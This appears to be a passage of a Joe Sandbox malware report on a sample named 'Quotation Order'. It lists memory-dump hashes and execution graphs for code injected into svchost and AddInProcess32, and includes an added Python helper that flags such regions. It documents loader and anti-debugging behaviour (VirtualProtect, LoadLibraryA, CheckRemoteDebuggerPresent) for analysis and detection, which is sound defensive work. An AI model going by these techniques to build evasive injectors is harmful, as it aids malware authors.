                                                                                                                                                                                                                                                    • Opcode ID: f82aca8611c01e94d673d45bc30a689a1c98d39733a832300be5b140783461b7
                                                                                                                                                                                                                                                    • Instruction ID: b099ee9c82b21dc4348f1b7c0d749b29e5c6e438182de305b317f14193f5fd42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f82aca8611c01e94d673d45bc30a689a1c98d39733a832300be5b140783461b7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC31E43190CA1C9FDB08EF5898496F9BBE1FBA9321F10422ED04AD3291CB706846CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; calls FreeConsole)
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 771614528-0
                                                                                                                                                                                                                                                    • Opcode ID: 761f67af348657ee1b68a6b6f2ec70ac3f9d1ee99081bff1a6d2f6d2c896850b
                                                                                                                                                                                                                                                    • Instruction ID: 033d73d8feceb611124c5afe505e6473f84138150e3ee94f5f9b9594775578be
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 761f67af348657ee1b68a6b6f2ec70ac3f9d1ee99081bff1a6d2f6d2c896850b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4631957190CB488FDB19DF68D8497EABBE4EB66321F00426ED089C3192DA74B455CB51
                                                                                                                                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4ffd186be057ee5b86a77ba9ad15b8c7afcceb0c35c85d5882a876e2f6a923c
• Instruction ID: 02abf1879ba70b3ca23d523377af58b9250aeae1b84f382469c72a0bb59dae1b
• Opcode Fuzzy Hash: d4ffd186be057ee5b86a77ba9ad15b8c7afcceb0c35c85d5882a876e2f6a923c
• Instruction Fuzzy Hash: 9451C334508A4D8FDB59EF19C894AB9B7A1FF54314F9402BAC04EC7186CEB5E856CBD0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6b892078cd57cfc290d6293d6b7d2399a1e3dc1db1ddd540bccc5311f61b21da
• Instruction ID: efe52d36a100a5b66ca3b97066afa302e84e8d36bff8db2b1ac8b55f9fa47719
• Opcode Fuzzy Hash: 6b892078cd57cfc290d6293d6b7d2399a1e3dc1db1ddd540bccc5311f61b21da
• Instruction Fuzzy Hash: 6241B63090C64A8FD755EF19C555ABCFBA0FF55314F9401BBC04ACB186DAB5A846CFA0
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID: J_L
• API String ID: 0-3966387191
• Opcode ID: f09f9c211f9021212fff059aee2672a7b97d431e0f1edae1363fb2e8cef9427a
• Instruction ID: 01c84cb591addb5c7fa83b729812ff413487bfc5864b3da159e4a4db49b2959c
• Opcode Fuzzy Hash: f09f9c211f9021212fff059aee2672a7b97d431e0f1edae1363fb2e8cef9427a
• Instruction Fuzzy Hash: DE42773090D6864FE759AF24C8516B5BBE1EF96324F4481BEC08ECB5D3CE68A846C761
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1ee04c4c12474ad430f60f33de10b8eef73679597b4bf13186d78ee79697803
• Instruction ID: 9b80c5c85f05c02909bbf4ebdab3fc596329b5a22070449795619d2e7de925c9
• Opcode Fuzzy Hash: c1ee04c4c12474ad430f60f33de10b8eef73679597b4bf13186d78ee79697803
• Instruction Fuzzy Hash: 0E62563090C6864FE758AF14C4416B4BBE2EF96324F5481BDD48ECB5D3DE68B886C7A1
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage:13.4%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:0%
Total number of Nodes:24
Total number of Limit Nodes:1

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 012f5ae2bd05e4b79548d847e69c6b9b365b9ec155466b3992d1f5361c1dbbaa
• Instruction ID: 8a1cc7fc282fb1e7ae4760e76c0c9cf4e27e4f3988ab120fd7a91f79315f204d
• Opcode Fuzzy Hash: 012f5ae2bd05e4b79548d847e69c6b9b365b9ec155466b3992d1f5361c1dbbaa
• Instruction Fuzzy Hash: E782157190DBC94FD756EF288C556A8BFA0EF56320F4901FFC489CB193DA68A846C361
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.1526069589.00007FF7C19B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7c19b0000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID: $
• API String ID: 1029625771-3993045852
• Opcode ID: 79a21bc5f9a4b46e9aa8f68292f5e21d564bcac745a515dd30e96eeb15f16191
• Instruction ID: f91a510f7e027bea4157821265d4ebee5f31d5d11d5c2b900f02c458132f3ec9
• Opcode Fuzzy Hash: 79a21bc5f9a4b46e9aa8f68292f5e21d564bcac745a515dd30e96eeb15f16191
• Instruction Fuzzy Hash: 4481C430508A4D8FEB58EF28D8457F5B7D1FF59325F10427EE84EC3292DA79A8418B92
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

163 7ff7c1a908c0 156->163 164 7ff7c1a9087b-7ff7c1a908a2 156->164 166 7ff7c1a90cd2-7ff7c1a90cfe 157->166 167 7ff7c1a90cc6-7ff7c1a90cc8 157->167 158->152 161->141 171 7ff7c1a908c2 163->171 172 7ff7c1a908c3-7ff7c1a908e1 163->172 164->115 176 7ff7c1a908a8-7ff7c1a908be 164->176 173 7ff7c1a90c97-7ff7c1a90cbf 167->173 174 7ff7c1a90cca-7ff7c1a90cd0 167->174 178 7ff7c1a9097d-7ff7c1a90990 168->178 179 7ff7c1a9090e-7ff7c1a90912 168->179 171->172 172->149 173->157 174->166 176->115 176->163 180 7ff7c1a90993 178->180 179->180 181 7ff7c1a90914 179->181 180->115 183 7ff7c1a90999-7ff7c1a909b5 180->183 182 7ff7c1a90974-7ff7c1a9097a 181->182 182->178 186 7ff7c1a909d2-7ff7c1a909e6 183->186 187 7ff7c1a909b7-7ff7c1a909cc 183->187 186->122 188 7ff7c1a909e8-7ff7c1a909ed 186->188 187->186 188->182 190 7ff7c1a909ef 188->190 190->115
Strings
Memory Dump Source
• Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
• Opcode ID: 6d48b0672d806bf4606f6d11d954b28e805308a2bf103f8cd3ca6b2be3aadfa4
• Instruction ID: a3eac143a8a83f0979467310b59f8364e3b115eae84f284bf033599cb4528985
• Opcode Fuzzy Hash: 6d48b0672d806bf4606f6d11d954b28e805308a2bf103f8cd3ca6b2be3aadfa4
• Instruction Fuzzy Hash: E672773180DB858FD716EF288C55AA8BFA0FF56350F5801FBC089CB193DA69A846C791
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks 7ff7c19b2d84-7ff7c19b2e7f (rendered image; edge list omitted); the block at 7ff7c19b2d96 calls VirtualProtect.
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1526069589.00007FF7C19B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7c19b0000_svchost.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 4c0645a3fb64ac6f7593a3afacde921d8eccb0bb556fd43704d7d7ba189764bf
• Instruction ID: 8f41caf9bdd682a58aec95fe67a2ccfba6140a96cde4eaef8abfe0fbb91342a5
• Opcode Fuzzy Hash: 4c0645a3fb64ac6f7593a3afacde921d8eccb0bb556fd43704d7d7ba189764bf
• Instruction Fuzzy Hash: 5C31F63090CB488FDB18EFA8984A6F9BBE1FF55321F04426FD049C3292CB746856CB91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Basic blocks 7ff7c19b0a58-7ff7c19b0b2b (rendered image; edge list omitted); the block at 7ff7c19b0a6a calls FreeConsole.
APIs
Memory Dump Source
• Source File: 0000000F.00000002.1526069589.00007FF7C19B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7c19b0000_svchost.jbxd
Similarity
• API ID: ConsoleFree
• String ID:
• API String ID: 771614528-0
• Opcode ID: 83b3ad090c49cb9c70e04bc7b10a7809ecae7306a5350dedb5ccf247260380e0
• Instruction ID: bbf762050bce9c1dca8712382451508ee2dbf6700b378d32d6b4e27e2dbfae73
• Opcode Fuzzy Hash: 83b3ad090c49cb9c70e04bc7b10a7809ecae7306a5350dedb5ccf247260380e0
• Instruction Fuzzy Hash: 3C31937090CB488FDB29DFA8D8497EABBF0EB55321F00426FD089C3192DB74A455CB51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8db72b8b5c3f5fe7d5d72cf392d1832fa6b7de7f0c9776f11809368073091a55
• Instruction ID: ffb9a928e9f8a1f914ab90ebbde95a6fc023efffa92663cac4d7dc479ac1cf2e
• Opcode Fuzzy Hash: 8db72b8b5c3f5fe7d5d72cf392d1832fa6b7de7f0c9776f11809368073091a55
• Instruction Fuzzy Hash: 4D61373050DBC94FDB46EF248C659A9BBF0EF5A324B4900FBD44ACB193CE68A845C391
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.1527028462.00007FF7C1A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7c1a90000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d4023085bdf6f550ae5bd4095bbb4848ff839268d5ad67143f4c8892b3ee29ca
• Instruction ID: fac63f06813a1179079d5619bc42d1d65ffbb4b40282fbe1b31b6e5a0f1530f3
• Opcode Fuzzy Hash: d4023085bdf6f550ae5bd4095bbb4848ff839268d5ad67143f4c8892b3ee29ca
• Instruction Fuzzy Hash: 7A21D431508A0D8FDB48EF14C8949B9B7E1FFA9318B51467ED00BC728ACE75E852CB90
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 12.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 10
Total number of Limit Nodes: 0

Executed API call sites (rendered image; edge list omitted):
• FreeConsole at 7ff7c1980a61, reached from 7ff7c1980a58
• VirtualProtect at 7ff7c1982d8d, reached from 7ff7c1982d84
• LoadLibraryA at 7ff7c1982930, reached from 7ff7c1982861 via a loop at 7ff7c1982874

The entry offsets +0xa58 and +0x2d84 are the same as those of the FreeConsole and VirtualProtect functions in the 7ff7c19b0000 dump above, i.e. this is the same code observed at a different base address.
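The dump entries above describe executable memory in svchost that is not backed by a PE image and whose execution graph resolves VirtualProtect and LoadLibraryA, the usual footprint of an injected loader stage. The following triage helper is an added example, not Joe Sandbox code: it decodes an .sdmp file name into its fields and applies those checks. The page confirms only the PID, stage and base-address fields (they recur in the hcaresult_15_2_7ff7c1a90000_svchost.jbxd snapshot name); decoding the fifth and seventh fields with the standard Win32 PAGE_* and MEM_* constants, and the meaning of the remaining fields, is an assumption. The benign comparison entry is constructed.

```python
"""Triage of a Joe Sandbox memory-dump entry from its file-name metadata.

Added example, not Joe Sandbox code. Assumed .sdmp name layout (only fields 1, 2
and 4 are confirmed by the report; the meaning of fields 5-8 is an assumption):

    <pid>.<stage>.<id>.<base>.<protect>.<field6>.<type>.<field8>.sdmp

Fields 5 and 7 are decoded with the documented Win32 PAGE_* and MEM_* constants.
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ",
              "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}
WRITABLE_EXEC = {"PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# APIs a loader stage typically touches: re-protect pages, resolve imports.
LOADER_APIS = {"VirtualProtect", "LoadLibraryA", "LoadLibraryW", "GetProcAddress"}

HEX8 = r"([0-9A-Fa-f]{8})"
SDMP_RE = re.compile(
    rf"^{HEX8}\.{HEX8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{HEX8}\.{HEX8}\.{HEX8}\.{HEX8}\.sdmp$"
)


@dataclass
class DumpInfo:
    pid: int
    stage: int
    base: int
    protect: str
    mem_type: str


def parse_sdmp_name(name: str) -> DumpInfo:
    """Split an .sdmp file name into its fields and decode the Win32 constants."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised sdmp name: {name}")
    pid, stage, _id, base, prot, _f6, mtype, _f8 = m.groups()
    prot_val = int(prot, 16) & 0xFF  # drop PAGE_GUARD / PAGE_NOCACHE modifier bits
    type_val = int(mtype, 16)
    return DumpInfo(
        pid=int(pid, 16),
        stage=int(stage, 16),
        base=int(base, 16),
        protect=PAGE_PROTECT.get(prot_val, f"0x{prot_val:x}"),
        mem_type=MEM_TYPE.get(type_val, f"0x{type_val:x}"),
    )


def triage(info: DumpInfo, based_on_pe: bool, apis) -> list:
    """Return the reasons a dumped region looks like injected or unpacked code.

    `based_on_pe` is the report's "based on PE" flag; `apis` are the imports the
    execution graph resolved inside the region. An empty list means nothing fired.
    """
    reasons = []
    executable = info.protect in EXECUTABLE
    if info.protect in WRITABLE_EXEC:
        reasons.append("writable and executable page protection")
    if executable and not based_on_pe and info.mem_type == "MEM_PRIVATE":
        reasons.append("executable private memory with no backing PE image")
    hits = sorted(LOADER_APIS & set(apis))
    if executable and not based_on_pe and hits:
        reasons.append("loader-style API use outside any image: " + ", ".join(hits))
    return reasons


if __name__ == "__main__":
    # Entry taken from this report (svchost, PID 15); API list from the execution graph.
    entry = parse_sdmp_name(
        "0000000F.00000002.1526069589.00007FF7C19B0000.00000040.00000800.00020000.00000000.sdmp"
    )
    for reason in triage(entry, based_on_pe=False,
                         apis=["FreeConsole", "VirtualProtect", "LoadLibraryA"]):
        print(f"[pid {entry.pid}] {entry.base:#x} {entry.protect} {entry.mem_type}: {reason}")
```

Run over the two svchost dumps listed here, all three checks fire; an image-backed PAGE_EXECUTE_READ region that happens to call LoadLibraryA fires none, which is the distinction worth automating when a report contains dozens of dumps.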

Control-flow Graph

Basic blocks 7ff7c1a60d71-7ff7c1a6194f (rendered image; edge list omitted), no API calls resolved in this function.
Memory Dump Source
• Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph data omitted)
Strings
Memory Dump Source
• Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph data omitted; this function calls LoadLibraryA)
APIs
Memory Dump Source
• Source File: 00000011.00000002.1474332610.00007FF7C1980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7c1980000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph data omitted; this function calls VirtualProtect)
APIs
Memory Dump Source
• Source File: 00000011.00000002.1474332610.00007FF7C1980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7c1980000_svchost.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph (graph data omitted; this function calls FreeConsole)
APIs
Memory Dump Source
• Source File: 00000011.00000002.1474332610.00007FF7C1980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7c1980000_svchost.jbxd
Similarity
• API ID: ConsoleFree
• String ID:
• API String ID: 771614528-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 33b5f0f7e9cf2d69311d5697b4386ebe9f4b13c8db2da11b2cfcda6f101a60a0
                                                                                                                                                                                                                                                    • Instruction ID: 9867afee1a5ebaf3087ff54d89218ab16439fd6a3e21cf2f1fcfdce90957bdd6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33b5f0f7e9cf2d69311d5697b4386ebe9f4b13c8db2da11b2cfcda6f101a60a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E61153150DB894FDB56EF3488699A5BFE0EF97314B0601FFC04ACB1A3DA28A805C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.1475323455.00007FF7C1A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1a60000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7f4c6968a2b376230b9fb93bf7d32ee7f88f9287f491dc64b0cb7989bdf392ab
                                                                                                                                                                                                                                                    • Instruction ID: a9fe9fa464c6d1741da212e47c164c587f3f643fccc585f6657f976e84c83dce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4c6968a2b376230b9fb93bf7d32ee7f88f9287f491dc64b0cb7989bdf392ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1121F231908D0C8FDB48EF18C8999B9B7E1FFA9318B51066ED00BC728ACE75A851C780
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:10.7%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:2.3%
                                                                                                                                                                                                                                                    Total number of Nodes:132
                                                                                                                                                                                                                                                    Total number of Limit Nodes:14

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-3993045852
• Opcode ID: 2d991a44670611384a67d1388edfb674b6da2e201b0caa121599d91ecdbfb624
• Instruction ID: 9de917495632e632e308964a349e6f83169dc2c98a6fb66cdfacf4a74e0083e7
• Opcode Fuzzy Hash: 2d991a44670611384a67d1388edfb674b6da2e201b0caa121599d91ecdbfb624
• Instruction Fuzzy Hash: 9122AE75E002088FDB69DF68C4906EEFBB2FF85310F24956AD415AB345DA35EC42CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1818 11e70c8-11e714c CheckRemoteDebuggerPresent 1820 11e714e-11e7154 1818->1820 1821 11e7155-11e7190 1818->1821 1820->1821
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 011E713F
Memory Dump Source
• Source File: 0000001A.00000002.1482200127.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_11e0000_AddInProcess32.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 4f272ae771b591f630501fecb4c6369eac8f855a5e188d7296d31c6499058038
• Instruction ID: dd48290634d36db2b3989641627546711c6c9b8022dfa7194355b0b670c25aa4
• Opcode Fuzzy Hash: 4f272ae771b591f630501fecb4c6369eac8f855a5e188d7296d31c6499058038
• Instruction Fuzzy Hash: E82128B19003598FDB14CF9AD484BEEBBF5AF49210F14841AE855A7350D778A944CFA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9904182c3f9a627acdde834e02b89553c2878ebb67872d4e94be58a4af2e9207
• Instruction ID: a84944e80d7e0205b66095ab8c676ea7b23d6eab4dc5d0af894666f1f89cbfe7
• Opcode Fuzzy Hash: 9904182c3f9a627acdde834e02b89553c2878ebb67872d4e94be58a4af2e9207
• Instruction Fuzzy Hash: 7CD25834E002098FCB65DF68C494AAEB7B2FF89310F5495AAD409AB355DB74ED81CF90
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a9d9589fc269f9c642e8f651f2b4a9e3f9209b10a0cf66e3015c0db3a290ea0a
                                                                                                                                                                                                                                                    • Instruction ID: 34d1080004770b2616635bdd0f56323944e9e9b5e48460fb3191384c46f4b05e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9d9589fc269f9c642e8f651f2b4a9e3f9209b10a0cf66e3015c0db3a290ea0a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6629C30B002049FDB55DB68D594BAEBBB2FF89310F15956AE406DB390DB35EC45CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6f19ad0d5dc91899b4dd19682ff420eee84ece367490474669f4de88d7f9b4c2
                                                                                                                                                                                                                                                    • Instruction ID: bf7320b9d76d7ebc41e10a5279587d868fa2a621efd10eb304dc02e3a2fecdea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f19ad0d5dc91899b4dd19682ff420eee84ece367490474669f4de88d7f9b4c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51527E30E002098FEB65DB68D4807EEB7B2FB45310F64952AE446EB791DE74DC81CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7bcc83d59e855aed0fc50c69faeb2dd8bcccb4d3993c4974d63ed73c3a0c51a0
                                                                                                                                                                                                                                                    • Instruction ID: b21c30d51b3a1630b7ff8096b1fdf3f79dcdf21328a25770ff38f7efa522bd5b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bcc83d59e855aed0fc50c69faeb2dd8bcccb4d3993c4974d63ed73c3a0c51a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F032AE30B106089FDB55EB68D5C5BAEB7B2FB88314F10952AE406EB345DB70EC41CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.1516576755.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_64b0000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5b9b4d9d6b94aaaf3d6ceec6852e792d8adc15a83498c1f041f2e7e7d7fd32c7
                                                                                                                                                                                                                                                    • Instruction ID: aa39f458d5318affc6fe5ef89ae83d2965e939185a5f8f667a03cf54ef02eb10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b9b4d9d6b94aaaf3d6ceec6852e792d8adc15a83498c1f041f2e7e7d7fd32c7
